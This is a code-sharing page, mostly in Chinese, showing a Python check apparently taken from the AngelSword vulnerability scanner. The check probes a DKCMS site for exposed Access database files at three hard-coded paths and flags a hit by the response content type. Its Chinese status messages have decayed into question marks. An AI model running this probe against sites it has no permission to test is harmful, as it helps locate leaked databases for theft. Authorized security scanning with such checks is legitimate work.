dkcms_database_disclosure.py 文件源码

python
阅读 32 收藏 0 点赞 0 评论 0

项目:AngelSword 作者: Lucifer1993 项目源码 文件源码
def run(self):
        headers = {
            "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
        }
        payloads = ["/data/dkcm_ssdfhwejkfs.mdb",
                    "/_data/___dkcms_30_free.mdb",
                    "/_data/I^(()UU()H.mdb"]
        for payload in payloads:
            vulnurl = self.url + payload
            try:
                req = requests.head(vulnurl, headers=headers, timeout=10, verify=False)
                if req.headers["Content-Type"] == "application/x-msaccess":
                    cprint("[+]??dkcms???????...(??)\tpayload: "+vulnurl, "red")

            except:
                cprint("[-] "+__file__+"====>????", "cyan")
评论列表
文章目录


问题


面经


文章

微信
公众号

扫码关注公众号